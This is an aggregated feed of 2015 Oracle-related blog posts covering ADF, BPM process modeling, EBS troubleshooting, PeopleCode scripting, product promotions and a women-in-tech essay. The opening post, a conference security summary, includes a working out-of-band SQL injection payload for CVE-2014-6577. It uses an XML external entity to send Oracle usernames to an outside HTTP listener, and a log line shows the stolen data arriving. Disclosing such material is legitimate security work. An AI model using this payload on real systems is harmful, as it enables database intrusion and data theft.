Feed aggregator

DOAG 2015: Best of Oracle Security 2015

Alexander Kornbrust - Thu, 2015-11-19 02:27

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found or modified that were released in 2015 from various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2, fixed in the April 2015 CPU). This bug can be used as a helper function in out-of-band SQL injection attacks. Since Oracle 11g, the route via utl_http/httpuritype has been closed off by ACLs. This exploit reopens that possibility in 11g/12c (if the patches are not applied).

—— Out-of-Band SQL Injection Example —————-

http://www.oraexploit.com/id=47' or 1=extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.83.1:8080/A='||substr((select sys.stragg(distinct username||'-') as string from all_users),1,220)||'"> %remote; %param1;]>'),'/l')

192.168.83.131 - - [18/Nov/2015 00:48:02] "GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0" 404 -

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

How Terminal Emulation Assists Easy Data Management

Kubilay Çilkara - Wed, 2015-11-18 21:25
Just about every company will need terminal emulation at some point. Yours may not need it now, but as time goes on, the day will come when you need information that can only be accessed with an emulator. This software allows a computer to basically take on the functionality of an older version. Doing so makes it possible for the user to access data that would otherwise be impossible to find. If you’re not sold on the benefits of using this type of software, consider the following ways that it assists with making data management easier.

Obtain Data from Outdated Systems

This is the most obvious way a terminal emulator helps with data management. Right now, you could have all kinds of data out of reach because it was created with software you no longer use or is stored on a platform that differs from the current one on your system.

Without an emulator, you're basically left hunting for a workaround. The usual one involves keeping a machine with the old operating system installed. This isn't just extremely inconvenient; it also isn't very cost-effective and is sure to become a bottleneck sooner or later.

With terminal emulation, no data ever has to be out of reach. Whether it's information from 10 years ago or 20, you can quickly retrieve whatever it is you need.

Access Multiple Terminals at Once

There’s far more these applications can do to assist with data management though. Over time, your company has probably—or will, someday—go through multiple platforms. This means that going back and grabbing the data you need could involve more than one system. If you tried using the aforementioned workaround, you’d be in for a huge challenge. It would take multiple computers, each with a specific operating system and then going between them to get the information you need or cross reference it as necessary.
Modern emulators can access as many terminals as you need all on the same computer. Usually, it just involves putting each one on separate tabs. Not only can you get all the info you need, then, you can do it from the screen all at once. This makes it extremely easy to cross reference data from one system against others.

Customize Your Queries
Another great benefit that comes with terminal emulation is that you can actually customize your searches to various degrees. For many companies, accessing old data means looking at screens that represent the info in the most rudimentary of ways. There may only be a few colors used for fonts on a black screen. Obviously, this can make data management a bit of a challenge, to say the least.
With the right software, though, you can control the font color, the character size, background and more. This makes it much easier to see the information you want, highlight it and otherwise keep track of the data. Never again suffer through old screens from outdated platforms when you need something.

Mobile Functionality

Like just about everything these days, terminal emulators have now gone mobile. You can now run emulation from just about anywhere in the world on your mobile device. This is a great way to make emulation possible for any work-at-home employees your company may have. If you hire a consultant or freelance professional from somewhere outside the office, mobile functionality means they can also benefit from easy data management. Next time you're on a business trip and need to access information from yesteryear, the ability to do so will be at your fingertips.

Mobile functionality may not seem like the most important aspect to have as far as emulation is concerned, but it’s better to have the option there than wish it was possible.

Save Money

Data management can be a costly endeavor. Unfortunately, it’s one of those costs your company really can’t hope to avoid. You need to manage your data, so you better find room in your budget. With terminal emulation, you can at least save money on this essential process.

As we brought up earlier, without an emulator you're looking at a lot of hardware to make sure vital data is never out of reach, to say nothing of how inconvenient that option would be. You're also looking at the potential cost of losing that data if anything happens to your dedicated machines. Furthermore, added hardware always comes with extra costs: the space you need, electricity, IT support and more.

In light of those added expenses, simply using emulation software should be a no-brainer. You don’t need any extra hardware and these platforms are designed to stay out of the way until you need them, so they won’t hurt your staff’s ability to use their current machines.

Limitless Scalability

No matter what kind of software we’re talking about, scalability always needs to be a concern. Today, your company may only have so much data to manage. A year from now, though, there’s going to be a lot more. Five years from now, your company’s collection of data will be expansive.
Obviously, managing this data efficiently is going to take a resource that can scale without difficulty. Keep in mind that a lot of companies increase their amount of data exponentially. This means scalability is necessary, but so is being able to scale at a moment’s notice to whatever size is needed.
Terminal emulation and scalability are virtually inseparable when you have the right software. No alternative solution is going to be able to keep up. Again, if you tried using hardware to manage your data, you can forget about easy scalability and forget about doing so without spending a lot of money in the process.


Data management needs to be a priority for every organization, no matter what industry they’re in. However, simple data management isn’t enough anymore. Instead, you need emulation software that will make it easy, cost-effective and scalable. Otherwise, your business will always be greatly limited in what information it can access and the benefits that could be derived from it.


Mike Miranda writes about enterprise software and covers products offered by software companies like Rocket Software, on topics such as terminal emulation, enterprise mobility and more.
Categories: DBA Blogs

Are you a PL/SQL Developer? [Fixed Link]

Gerger Consulting - Wed, 2015-11-18 06:18
Then attend our webinar and learn how you can build first class web applications with PL/SQL.



The application above is built using only PL/SQL and Formspider. No Java, no JavaScript. Join our webinar and learn how. Every attendee will get priority access to the source code of this application. We'll also give you an opportunity to purchase Formspider at a discount. :-) Sign up today.
Categories: Development

Presentation slides for my presentation at DOAG 2015 - Apache - ORDS Setup for Production Environments

Dietmar Aust - Wed, 2015-11-18 05:41
Hi guys,

here you can find the slides, the config files and the installation steps for my presentation at the DOAG conference in Nürnberg on 18.11.2015:

http://www.opal-consulting.de/downloads/presentations/2015-11-DOAG-ORDS-Setup/

Enjoy!

Cheers,
~Dietmar.

IBM Bluemix Secure Gateway Service Step by Step Demo

Pas Apicella - Tue, 2015-11-17 21:15
I created this simple step-by-step guide on how to use the IBM Secure Gateway Service. It's a very simple demo which shows how easy it is to set this up and open up a world of possibilities, exposing on-premise resources directly via Bluemix, whether it's a public instance or a dedicated/local one.

https://dl.dropboxusercontent.com/u/15829935/bluemix-docs/secure-gateway/index.html



Categories: Fusion Middleware

Remote TaskFlows/Remote Region - For Advanced Reusability in Oracle ADF

Shay Shmeltzer - Tue, 2015-11-17 17:56

A new feature in Oracle ADF 12.2.1 is Remote TaskFlows (or Remote Regions) - this allows one application to have regions inside it that are populated from taskflows that are running as part of another application.

Initially some of you might be a bit confused - "wasn't this something that we were able to do with ADF libraries already? We could just package a taskflow from one app as an ADF library and use that library in the other application".

The slight distinction here is that the library approach had the taskflow running as part of your consuming application. Remote task flows, on the other hand, have the taskflow running as part of the other application and don't require the creation of a library. As a result they also don't require an ADF library update when the taskflow changes - the minute the changes are deployed on the remote server, your application will get the new version.

One way of thinking about remote taskflows is as adding a "portal" like functionality to your ADF app - allowing one app to display parts of another app leveraging the other app resources for executing any logic. 

Here is a quick video demoing how to configure and run this.

The URLs you'll need for creating the remote region resource connection are:

http://yourserver:port/your-context-root/rtfquery

and

http://yourserver:port/your-context-root/rr

Note that there are some limitations on the type and functionality of taskflows that can be exposed as remote taskflows. And there are other things to consider such as security and session timeout settings. So have a read through the remote region documentation before you start leveraging this feature.

A couple of notes.

1. In the currently available 12.2.1 version of JDeveloper from OTN, there is a slight bug that will prevent you from creating the connection to the remote task flow - there is a patch available for this from Oracle Support - request the patch for bug 22132843 or 22093099.

2. At my OOW session about new features I mentioned that remote task flows are loaded in parallel. That is actually not yet the case - while we started work on this capability, it didn't make it into 12.2.1. So remote task flows behave like other task flows and load in a sequential way right now.

Categories: Development

PeopleSoft Information Portal--New and Improved!

PeopleSoft Technology Blog - Tue, 2015-11-17 17:01

The PeopleSoft Info Portal is a popular one-stop shop for getting at everything PeopleSoft. If you are looking for information on PeopleSoft and wondering where to begin, that is often the best place to start. It's an easy name to remember: www.peoplesoftinfo.com. The new site is responsive, so you can access it from any form factor. If you have any questions, want to find out what's new or what's coming in the future, or want to learn more, try the PeopleSoft Information Portal.


Be Quick, But Don't Hurry

Floyd Teter - Tue, 2015-11-17 11:38
In the month since I joined Oracle, many people have asked about the work I'm doing here. And, in all honesty, the work is so varied that I've had a difficult time describing it.

Yesterday, I was traveling from my home in Salt Lake to Oracle Corporate HQ in Redwood Shores.  Having landed in San Francisco, I was in a rush to get my rental car, make the drive to HQ, and get some productivity out of what was left of my day.

In San Francisco, you take a light rail to get from the airline terminals to the rental car building. The rail lines run every 10 minutes. As I was approaching the platform to pick up the light rail, one of those every-10-minute trains was just pulling into the station. So I hefted my two carry-on bags and started a mad dash to the train. And about four steps into that mad dash, I tripped and fell...luggage flying, me on the ground, cussing up a storm. Know why I tripped?  For the classic reason...my shoelace was untied.

I was in such a hurry that I failed to check my shoelaces anywhere between leaving the plane and my failed attempt at breaking the Earth's gravitational pull.

My favorite basketball coach of all time, John Wooden, had a coaching principle of "be quick, but don't hurry". The idea was to have an efficient system and to work with a sense of urgency within that system. That's being quick. When you step out of the boundaries to get something done as soon as possible, you're in a hurry...but at the risk of no longer being quick. Your shoelaces come untied, you trip, and the mistake causes you to miss the light rail altogether. You invest more time in waiting for the next opportunity...mission bjorked.

So one of the primary things I'm doing at Oracle?  Working on enabling those around me to be quick while discouraging them from being in a hurry.  That's a big chunk of what a good Center of Excellence does.

Are you a PL/SQL Developer? Are you an Oracle Forms Developer?

Gerger Consulting - Tue, 2015-11-17 01:45
Then attend our webinar and learn how you can build first class web applications with PL/SQL.



The application above is built using only PL/SQL and Formspider. No Java, no JavaScript. Join our webinar and learn how. Every attendee will get priority access to the source code of this application. We'll also give you an opportunity to purchase Formspider at a discount. :-) Sign up today.
Categories: Development

sqlplus core dumps with segmentation fault error in OEL 6.6 when you connect to DB

Vikram Das - Mon, 2015-11-16 16:23
We used an OEL 6.6 image in our latest build. We then cloned an EBS R12.2 instance that was on OEL 5.7 to this new server running OEL 6.6. During the clone, adcfgclone.pl was failing. On further checks, we discovered that sqlplus was crashing with a segmentation fault error whenever we tried to connect to the database:

sqlplus /nolog
conn apps/apps
Segmentation Fault

So I suggested that the DBAs run strace sqlplus apps/apps. The strace revealed many missing libraries:

We had another working OEL 6.4 instance where we checked for these libraries, and all of them were present.

The locate command was used to locate the full directory paths of the missing libraries

locate libnss_sss.so.2
/lib/libnss_sss.so.2

/lib/libnss_sss.so.2
/lib/libnss_files.so.2
/lib/libociei.so
/lib/libc.so.6
/lib/libgcc_s.so.1
/lib/libnsl.so.1
/lib/libpthread.so.0

Then rpm -qf command was used to find out the rpm that would have the library:

$ rpm -qf /lib/libnss_sss.so.2
sssd-client-1.11.6-30.el6_6.3.i686
$ rpm -qf /lib/libnss_files.so.2
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libociei.so
error: file /lib/libociei.so: No such file or directory
$ rpm -qf /lib/libc.so.6
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libgcc_s.so.1
libgcc-4.4.7-3.el6.i686
$ rpm -qf /lib/libnsl.so.1
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libpthread.so.0
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libm.so.6
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libdl.so.2
glibc-2.12-1.149.el6_6.9.i686

Since the 10.1.2 home is 32-bit in EBS R12.1 and 12.2, all of these libraries needed to be 32-bit.
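As a side note, a quick sanity check for the 32-bit requirement is to inspect the binary and its shared libraries with file and ldd. This is just a minimal sketch, assuming the 10.1.2 ORACLE_HOME is set in the environment; actual paths will vary per install:

$ file $ORACLE_HOME/bin/sqlplus                    # should report an ELF 32-bit executable
$ ldd $ORACLE_HOME/bin/sqlplus | grep "not found"  # lists shared libraries it cannot resolve
$ file /lib/libnss_sss.so.2                        # confirms the architecture of a single library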

Except for sssd-client, the other rpms were present. The 64-bit version of sssd-client was installed, and whenever we tried to install the 32-bit rpm it would give this error, as the operating system thinks that it is already installed:

# yum install sssd-client.i686
Loaded plugins: security
Setting up Install Process
Resolving Dependencies
--> Running transaction check
---> Package sssd-client.i686 0:1.12.4-47.el6 will be installed
--> Finished Dependency Resolution
Error:  Multilib version problems found. This often means that the root
       cause is something else and multilib version checking is just
       pointing out that there is a problem. Eg.:

         1. You have an upgrade for sssd-client which is missing some
            dependency that another package requires. Yum is trying to
            solve this by installing an older version of sssd-client of the
            different architecture. If you exclude the bad architecture
            yum will tell you what the root cause is (which package
            requires what). You can try redoing the upgrade with
            --exclude sssd-client.otherarch ... this should give you an error
            message showing the root cause of the problem.

         2. You have multiple architectures of sssd-client installed, but
            yum can only see an upgrade for one of those arcitectures.
            If you don't want/need both architectures anymore then you
            can remove the one with the missing update and everything
            will work.

         3. You have duplicate versions of sssd-client installed already.
            You can use "yum check" to get yum show these errors.

       ...you can also use --setopt=protected_multilib=false to remove
       this checking, however this is almost never the correct thing to
       do as something else is very likely to go wrong (often causing
       much more problems).

       Protected multilib versions: sssd-client-1.12.4-47.el6.i686 != sssd-client-1.11.6-30.el6_6.4.x86_64


# rpm -qa | grep sssd-client
sssd-client-1.11.6-30.el6_6.4.x86_64

Eventually we installed it with force option

# rpm -Uvh --force /tmp/sssd-client-1.11.6-30.el6_6.3.i686.rpm

# rpm -qa | grep sssd-client
sssd-client-1.11.6-30.el6_6.3.i686
sssd-client-1.11.6-30.el6_6.4.x86_64

pam-ldap was one of the other rpms that was installed for the other missing libraries. Surprisingly, the sssd-client and pam-ldap rpms are not mentioned as pre-requisites in the support.oracle.com article:
Oracle E-Business Suite Installation and Upgrade Notes Release 12 (12.2) for Linux x86-64 (Doc ID 1330701.1) 
Categories: APPS Blogs

twm: unable to open fontset "-adobe-helvetica-bold-r-normal--*-120-*-*-*-*-*-*"

Vikram Das - Mon, 2015-11-16 15:59
While launching twm, it gives this error and exits to the Unix prompt:

twm: unable to open fontset "-adobe-helvetica-bold-r-normal--*-120-*-*-*-*-*-*"

I found a solution on http://ubuntuforums.org/archive/index.php/t-1596636.html :

It was reported here for Fedora: https://bugzilla.redhat.com/show_bug.cgi?id=509639. The workaround is to execute it with a specific shell variable set:

$ LANG=C
$ export LANG
$ twm &

twm launches fine after this.
Categories: APPS Blogs

REST based CRUD with Oracle ADF Business Components

Shay Shmeltzer - Mon, 2015-11-16 12:17

A key new feature in Oracle ADF 12.2.1 is the ability to expose ADF Business Components through REST/JSON interfaces.

REST/JSON is the preferred interface for many client side UI technologies to access remote backend services - as examples both Oracle JET and Oracle MAF leverage REST as the way to access data from remote servers. 

Oracle ADF makes it very simple to expose your existing business components as REST services - all through a declarative set of dialogs.

Once you have published the service interface for a view object, you should be able to do the full set of CRUD operations on that object through different REST actions:

GET - will do a Read

POST - will do a Create

PATCH - will do an Update

DELETE - will do a Delete

One thing that you'll want to verify is that when you are passing JSON data back into the REST interface, you specify the following in the header:

Content-Type is application/vnd.oracle.adf.resourceitem+json

otherwise you'll get an error along the lines of:

oracle.adf.internal.model.rest.core.exception.CannotParseContentException: The content type is not a ADFm REST entity. Content-Type: text/plain 
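For illustration, here is a minimal curl sketch of an update (PATCH) call with that header set. The host, context root, resource path and payload field below are hypothetical placeholders, not the actual service built in the video:

curl -X PATCH "http://yourserver:port/your-context-root/rest/v1/Employees/101" \
  -H "Content-Type: application/vnd.oracle.adf.resourceitem+json" \
  -d '{"Salary": 9000}'

A GET against the same resource URL (without a body) would read the row, POST with a JSON body would create one, and DELETE would remove it.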

In the video below I show very quickly how to expose a REST interface and then how to invoke all the CRUD operations directly from the chrome app "Postman". 

This new feature can make your Oracle ADF business services part of any new application that prefers a REST/JavaScript/HTML5 type of architecture.

Read more about exposing Oracle ADF BC as REST in the documentation.

Categories: Development

Women in Tech: Where Are They?

Usable Apps - Sun, 2015-11-15 12:39

Watching thousands of techies storm the floors and swarm the 20+ summits at Web Summit 2015 was an extraordinary experience. As I really looked at the people walking around, though, I couldn’t help thinking, “Where are the women?” Of course I saw women, but I saw far fewer women than men.

Web Summit Centre Stage

Not relying on my own unofficial observations, I noted a V3 article that not only validated my observations with reflections that mimicked mine but went on to share this data point from Capgemini: “only 18 percent of speakers at Web Summit 2015 were women.”

To be fair, though, throughout the Web Summit, significant awareness was placed on the ever troubling lack of women in professional roles in tech. Hearing different speakers and panelists comment on the state of Women In Technology (WIT) got me wondering: Who exactly are WIT? And why wouldn’t more women pitch up “at the best technology conference on the planet” (Forbes)?

Unofficially, I asked roughly 50 people from both inside and outside of the software industry to tell me who they think WIT are. I found it interesting that the majority of those who answered mentioned engineering, scientific, and developer job titles or gave me the name of a woman they know who holds a role with a similar job title.

These responses got me thinking about the shape of WIT—who’s in, who’s out. Without a doubt, those women who hold roles with technical job titles are in. But what about those women who have dedicated their entire careers to the tech industry but don’t hold job titles that include the word engineer or developer—women, for example, who design (but don’t build) software or those who write about how to extend or customize software?

Shouldn’t women who’ve built careers in technology and who’ve spent years deep-dive learning about specific industries, domains, software, platforms in order to write content that enables users, as well as those who who’ve spent years designing user experiences as well as developing conceptual object and data models, or those who occasionally code—but never held a job title that includes engineer or developer—count, too?

Microsoft’s Peggy Johnson, EVP, Business Development: Partner, thrive or die session

During my three days at the Web Summit, I attended as many sessions as I could in which women were speakers or panelists. I was hoping to learn from them—learn more about the “who counts” aspect of WIT, as well as hear creative proposals or solutions that address the gender imbalance in the tech world. While today’s grassroots efforts, such as Black Girls Code and CoderDojo, are fantastic, we need to proactively create a next generation of tech women, or we will simply continue having this same conversation.

Sinead Murphy’s “commitment to change” gave me hope that the momentum towards such change is increasing: “As part of an initiative we’re [Web Summit] running to even the gender ratio at our events, we’re giving 10,000 complimentary tickets to our events to women in the tech industry across the world – we hope that it will, in some small way, contribute to solving the problem." The Web Summit will invite “10,000 female entrepreneurs as [Web Summit] guests in 2016.” The Women In Tech Summit will be held in Lisbon next year.

An equally remarkable commitment was announced at Oracle OpenWorld 2015. Oracle CEO Safra Catz announced Oracle’s plan to build a new public school, d.tech, saying, “I’ve realised it’s absolutely critical that big companies like ours […] to do something because when you look at the statistics, you realise there are simply not enough women in the pipeline in the math and science education areas.” For more about this new high school, read the diginomica article, Oracle OpenWorld 2015 - Safra Catz on the tech industry's female talent pipeline problem.”

Clearly these are excellent examples of forward movement. But we—ALL women who work in tech, as well as our male colleagues—have the opportunity to step up and do more. The challenge of drawing more women into all types of tech roles—no matter the job title—belongs to each and every one of us. What will you do?


Learn more about Oracle’s WIT in these inspiring stories. And be sure to check out the Oracle Women in Technology Program.

Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured

Vikram Das - Sat, 2015-11-14 14:57
Today, during a cutover when we were moving one of our ERP instances from Cisco UCS VMware VMs to Exalogic and Exadata, I got a call from Bimal.  The extranet iSupplier URL had been configured, but whenever any user logged in, they were seeing the following error instead of the iSupplier OAF Home page:

Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured

A search on support.oracle.com showed many hits.  I went through a few of them and ruled out the solutions given. This article sounded promising: Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured (Doc ID 1474474.1).

The solution suggested:

There is a hardware load-balancer in place for a multi-tier environment, as well as an SSL accelerator.

     For R12, there is a context variable, s_enable_sslterminator, that was set to "#".

     This should be null for E-Business R12 using the specific hardware mentioned before.


1. Set the context variable s_enable_sslterminator to null.

2. Re-run autoconfig.

3. Re-test single sign-on via IE and Firefox; it now works as expected.

I asked the DBAs to check the value of s_enable_sslterminator:

grep s_enable_sslterminator

and sure enough the value was #

As per the article Enabling SSL or TLS in Oracle E-Business Suite Release 12 (Doc ID 376700.1), the value of s_enable_sslterminator should be made null if you are using an SSL accelerator.  In our case we use an SSL certificate on the load balancer and never on the web servers.
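For reference, a minimal sketch of the check and fix on the application tier could look like this (assuming the standard $CONTEXT_FILE and $ADMIN_SCRIPTS_HOME variables from the EBS environment; file locations may differ in your setup):

$ grep s_enable_sslterminator $CONTEXT_FILE
# if the value between the tags is "#", edit it to be empty (null), then re-run autoconfig:
$ cd $ADMIN_SCRIPTS_HOME && ./adautocfg.sh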

The DBAs removed the #
Ran autoconfig
Deregistered SSO
Registered SSO

The user was able to login after that.



Categories: APPS Blogs

Oracle Priority Support Infogram for 12-NOV-2015

Oracle Infogram - Thu, 2015-11-12 15:22

OpenWorld

Another OpenWorld is in the books, and now it’s time to absorb and pursue the material covered. Here’s a good place to get started: Continue Learning Post-Oracle OpenWorld

RDBMS


WLS

The complete guide to tuning the appearance of NetBeans, from WebLogic Partner Community EMEA.


Security

Security Alert CVE-2015-4852 was released on November 10th, 2015.

This vulnerability, which involves the Apache Commons and Oracle WebLogic Server, has received a CVSS Base Score of 7.5.

Due to the severity of CVE-2015-4852, Oracle strongly recommends applying mitigation steps and patches as soon as available.

The Security Alert Advisory for CVE-2015-4852 is the starting point for relevant information. This Security Alert provides mitigation recommendations to be implemented while awaiting the release of Oracle WebLogic Server patches. It includes links to other important documents that provide a list of affected products and the patch availability information. It is essential to review the Security Alert supporting documentation referenced in the Advisory before applying patches or mitigation instructions.

The Security Alert Advisory is available at the following location:
http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html

Mitigation instructions are available at: https://support.oracle.com/rs?type=doc&id=2076338.1

WebLogic Server Patch Availability information will be updated at:
https://support.oracle.com/rs?type=doc&id=2075927.1

All Oracle Critical Patch Updates and Security Alerts are available on the Oracle Technology
Network at: http://www.oracle.com/technetwork/topics/security/alerts-086861.html

SPARC and Solaris

Virtual HBA in Oracle VM Server for SPARC, from Virtually All The Time.


SPARC M7 Software In Silicon - Useful Webinar, from Notes from the Main Sequence.


Fusion

Fusion Middleware 12c – Selective tracing, from SOA & BPM Partner Community Blog.

Java

When is the next Java update?, from Java Platform Group, Product Management blog.


Oracle Retail


EBS

From the Oracle E-Business Suite Support blog:






From the Oracle E-Business Suite Technology blog:



How to Keep Your Business Process Looking Simple

Jan Kettenis - Thu, 2015-11-12 12:32
There are two key words in Business Process Management Notation (and Language), or BPMN for short, that very often seem to be missed. The first is "business", the second "management". In this posting I will discuss the significance of the first, and how you are in control of that.

In BPMN the word business is not meant to express that it is "just" about modeling business processes. The idea is also that these models should be understandable by, or even created by, the business. Now one can argue that with respect to the latter BPMN does not always seem to deliver on the promise, or at least not for every business. But I know of a few cases where the business analyst creates the non-technical versions of the model (level 1 and 2, as Bruce Silver would call them), and I know of a significant number of cases where the business, or at least the analyst, is able to understand BPMN process models. That is to say, if these models have not been cluttered with technical details.

Unfortunately this cluttering happens quicker than you wish, and too often the executable process models are almost beyond comprehension for the business, while there is no good reason for that. And that is too bad, because you then miss the opportunity to have the executable process model validated by that business. Observing how process modeling is done at some of my projects, I unfortunately have to conclude that quite a few people are not aware of the problem or don't know how to prevent it, and as I have not (yet) found any reference that gives a comprehensive overview of the options offered by the Oracle BPM Suite that can help you out, I discuss them in the following.

Embedded Sub-Process

The embedded sub-process is one of the options that most people are aware of, and (generally) it is reasonably well used. In the example below an embedded sub-process with the name "Store Order" contains a script activity "Create Message Header" that constructs the header for the message to be used in the service call activity "Save Order Data". By simply collapsing the embedded sub-process, the technical details of how an order is stored can be hidden from the business, which typically does not want to know that a header needs to be created. One could argue they should not even be interested in the fact that this is done synchronously (using a service activity) instead of asynchronously (using a send and receive activity), which is also conveniently hidden by the embedded sub-process.





Apart from using it to hide technical details, an embedded sub-process can also be used to determine a scope. This can be done from a business perspective (for example to determine a scope of activities that might be repeated, or for which multiple instances should be handled in parallel), but also from a technical perspective (for example as a scope for temporary variables, or for exception handling).

The issue I often see with embedded sub-processes in practice is that developers very often do not bother to collapse them, still exposing technical details to the business.

One should be aware of a couple of aspects concerning embedded sub-processes. The first is that they are not reusable (meaning you cannot use them elsewhere in the same or any other process model). The second is that they come with a little overhead from an audit perspective, as every embedded sub-process results in 2 extra entries (one for its start and one for its end).

Reusable Sub-process

A reusable sub-process is created as a separate process. The only thing that distinguishes it from other types of processes is that it has a none start as well as a none end event, and it cannot have an initiator activity. As the name already suggests, a reusable sub-process is never started directly, but only by calling it from some parent process. This is done by the Call activity.

Going back to the step in the example where we want to save order data: if we assume the order has to be updated more than once, then this makes it a typical candidate for reuse. In the following example a reusable sub-process "Order Storage" has been created that contains this functionality. It has been made a little bit more complex by including a notification activity that notifies the sales representative every time an update of the order has taken place.



The reusable sub-process has access to the project variables (by value), and its own process variables. In other words, the reusable sub-process has access to the "order" project variable. A choice has been made to pass on the email address of the one that has been notified, as an argument. In the reusable sub-process this email address is stored in a (local) "email" process variable.

The choice to define a variable at project versus process level should be made carefully. Project variables are global variables with the following properties:
  • In case of functionality that is executed in parallel, one should be careful that the parallel threads do not make conflicting changes to the same project variable.
  • Simple type project variables are mapped to protected attributes (also known as mapped attributes or flex fields), of which there is a limited number (for example 20 protected text attributes). Their values are stored in separate columns (instead of being part of the process payload).
  • The lifespan of a project variable is from its initialization up to the end of the (main) process instance.
Like an embedded sub-process, a reusable sub-process is executed in the same thread. A reusable sub-process is only reusable within the same BPM project (composite) and cannot be shared with other projects. A reusable sub-process adds a little more overhead to auditing than an embedded sub-process does.

Finally, up to version 12.1.2 a Call activity in a BPM project makes it incompatible with any other revision, meaning that you cannot migrate instances. Period. Not even when you deploy the same revision without changing any bit of your code. For most customers I work with, this is a major limitation, and some therefore choose not to use reusable sub-processes.

Process As a Service
The next alternative to a reusable sub-process is the process-as-a-service, which means that you start it with a message start event or send activity. Any response is returned by a message end event or receive activity. As long as the process-as-a-service is part of the same BPM project (composite) it can make use of the project variables, but only by definition, not by value. So all data has to be mapped to and from the process. You can put the process in the same composite, or put it in a composite of its own. The criterion for doing the latter would be reuse across composites. When it is in a separate composite, you cannot reuse the business objects, nor the project variable definitions.

From a functional perspective, the process-as-a-service is equivalent to a reusable sub-process. From a technical perspective it requires more work if you implement it in a separate composite, and it will add extra overhead to auditing (not only BPM auditing, but also every instance will have its own entry in the COMPOSITE_INSTANCE and CUBE_INSTANCE tables). In 11g you will also have to create some custom mechanism to propagate cancellation of the parent instance to child instances, but in 12c this is automatically done (see also http://kettenisblogs.blogspot.nl/2015/08/oracle-soabpm-12c-propagation-of-flow.html).

Detail Activity
Since 12c you can "detail" an activity. With that you can hide logic that is tightly related to an activity, but has to be done using an activity of its own. From the outside a detailed activity looks like any other activity, and keeps the original icon associated with it. You can see that it is detailed by a + sign at the bottom, very much like an embedded sub-process. And basically that is what it is, a specialized embedded activity. You can even have local variables, and in the structure pane it is represented as an embedded sub-process. Again, to keep the business process a "business" process you should try not to get over-excited and put all sorts of logic in it that really belongs somewhere else. Use it only for logic that is tightly coupled to the main activity, but of any importance to the business.

In the following example I have implemented a call to some service that has to happen right after the user activity. It is a technical service call that we don't want to bother the business with, as it concerns a call to a service to confirm the order to the customer. As far as the business is concerned, this is an integral part of the Contact Provider activity, and they should not care if that service is called from the UI or from the process for that matter.



Hope you can make good use of this, and let me know if you have any other suggestion!!

Developing an Application with PL/SQL, the Formspider Way

Gerger Consulting - Thu, 2015-11-12 03:05
On November 24, attend our webinar to watch Professional Consultant Nicholas Mwaura as he talks about his experience with Formspider and shows you how you can build first class applications to impress your prospective customers and end users.

Watch a short demo of the application Nicholas will show you how to build:



During the webinar the following topics will be discussed:
  • The importance of Formspider for PL/SQL developers and Oracle customers
  • Why Oracle Forms applications are very easy to migrate to Formspider
  • Introduction to the demo application
     
  • Building the demo application: How to design the UI, how to work with windows, panels, tabs, trees and various other Formspider components, working with LOV’s, application structure in the database. 
At the end of the webinar, the attendees will get priority access to the source code of the demo application.

During the webinar, each attendee will receive a discount offer for Formspider developer licenses! :-)
 
Sign up to the webinar now!
Categories: Development

JavaScript and PeopleCode Array Parameters

Jim Marion - Tue, 2015-11-10 18:29

I have been experimenting with scripting PeopleCode using JavaScript. This is possible because Java includes Mozilla's Rhino JavaScript engine. I took one of my experiments to OpenWorld 2015, showing how to create a Microsoft Excel spreadsheet using POI and JavaScript. Here we are, a couple of weeks later, and I see this in the PeopleSoft OTN Discussion Forum: Java Exception: java.lang.reflect.InvocationTargetException: during call of java.lang.reflect.Method.invoke. Perfect! That is my exact use case from OpenWorld. I just happen to have a code sample to share on the forum.

The developer's scenario was a bit more complicated. As you will note from the forum post, the developer needed to invoke SQL.Fetch from JavaScript. The JavaScript version of SQL.Fetch, which uses the PeopleCode Java interface, requires an array of selected columns. My first thought was just to use a standard JavaScript array. Since the SQL only has one column, I just needed an array with one item. This didn't work. JavaScript Arrays clearly are not Java Arrays. Here is an example:

var result = (function() {
  var ReflectiveArray = java.lang.reflect.Array;
  var CreateSQL = Packages.PeopleSoft.PeopleCode.Func.CreateSQL;
  var columns = ReflectiveArray.newInstance(java.lang.Object,
      1 /* number of selected columns */);
  var results = [];

  SQL = CreateSQL("SELECT OPRDEFNDESC FROM PSOPRDEFN WHERE ROWNUM < 10");
  while (SQL.Fetch(columns)) {
    results.push(columns[0]);
  }

  return results.join();
}());
